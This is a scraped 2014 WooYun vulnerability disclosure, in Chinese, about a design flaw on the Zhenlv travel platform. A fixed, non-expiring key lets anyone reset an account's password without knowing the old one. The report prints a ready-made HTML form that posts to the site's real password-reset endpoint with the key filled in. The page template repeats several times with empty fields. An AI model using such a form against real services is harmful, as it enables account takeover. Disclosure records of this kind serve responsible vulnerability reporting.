真旅网设计缺陷导致持久控制账号及无需原密码修改密码

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2014-084325

漏洞标题：真旅网设计缺陷导致持久控制账号及无需原密码修改密码

漏洞作者： tzrj

提交时间：2014-11-24 11:17

修复时间：2015-01-08 11:22

公开时间：2015-01-08 11:22

漏洞类型：设计缺陷/逻辑错误

危害等级：中

自评Rank：10

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2014-11-24：细节已通知厂商并且等待厂商处理中
2014-11-27：厂商已经确认，细节仅向厂商公开
2014-12-07：细节向核心白帽子及相关领域专家公开
2014-12-17：细节向普通白帽子公开
2014-12-27：细节向实习白帽子公开
2015-01-08：细节向公众公开

简要描述：

真旅网设计缺陷导致持久控制账号及无需原密码修改密码

详细说明：

这个key可以通过

获得
这里可以看到需要原密码
地址栏有个key 放到漏洞证明里面的代码中无需原密码修改密码
这个key不会变可以一直这样控制账号

漏洞证明：

<div class="row gray-border" style="margin-top:20px;">
        <h3 class="title"><strong>设置新密码</strong></h3>
        <div class="row" style="height:330px;">
            <ul class="find_password">
              <form action="http://store.tdxinfo.com/tops-front-purchaser/user/setNewPassword" method="post" name="setNewPasswordForm">
                <li>
                    <label><div>新登录密码:</div><input type="password" name="password" class="normal_txt" style="width:150px;"/></label>
                </li>
                <li>
                <label><div>确认新密码:</div><input type="password" name="confirmPassword" class="normal_txt" style="width:150px;" placeholder=""/></label>
                </li>
                <li>
                    <div style="margin-left:130px;">
                        <a class="adaptiveButton brightRed_btn" href="javascript:void(0);" onclick="document.setNewPasswordForm.submit();">
                            <span class="left"></span>
                            <span class="center center_1">确&nbsp;&nbsp;认</span>
                            <span class="right"></span>
                        </a>
                    </div>
                </li>
                <input name="key" type="hidden" value="546f231545cec70f6b535eda"/>
              </form>
            </ul>
        </div>
    </div>

这段代码可以修改tzrj这个账号的密码不会失效

修复方案：

你知道的

版权声明：转载请注明来源 tzrj@乌云

漏洞回应

厂商回应：

危害等级：中

漏洞Rank：8

确认时间：2014-11-27 15:13

厂商回复：

我们欢迎和鼓励白帽子在不影响系统、破坏系统以及窃取数据的前提下，对我们真旅网旗下各个平台做安全检测。
我们将根据漏洞等级/严重程度给予报告漏洞的白帽子发放相应的Rank及礼物。
新系统列表(含里面菜单包括的所有模块)：
天地行：www_tdxinfo_com (主平台)
运营商：op_tdxinfo_com
供应商：provider_tdxinfo_com
B2G： vipcorp_travelzen_com
注：
1，请大家对我们列表的站点进行检测，列表外的特别是废弃不用的系统，我们将不再给予礼物发放哦，谢谢谅解！
2，漏洞细节严禁包含密码、敏感资料等内容，未做处理的一律给予1分并不发送礼物，请大家注意哦~

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2014-084325

漏洞标题：真旅网设计缺陷导致持久控制账号及无需原密码修改密码

相关厂商：真旅网集团

漏洞作者： tzrj

提交时间：2014-11-24 11:17

修复时间：2015-01-08 11:22

公开时间：2015-01-08 11:22

漏洞类型：设计缺陷/逻辑错误

危害等级：中

自评Rank：10

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 tzrj@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2014-084325

漏洞标题：真旅网设计缺陷导致持久控制账号及无需原密码修改密码

相关厂商：真旅网集团

漏洞作者： tzrj

提交时间：2014-11-24 11:17

修复时间：2015-01-08 11:22

公开时间：2015-01-08 11:22

漏洞类型：设计缺陷/逻辑错误

危害等级：中

自评Rank：10

漏洞状态：厂商已经确认

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2014-084325"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 tzrj@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞概要关注数(24) 关注此漏洞

Tags标签：无

4人收藏收藏
分享漏洞：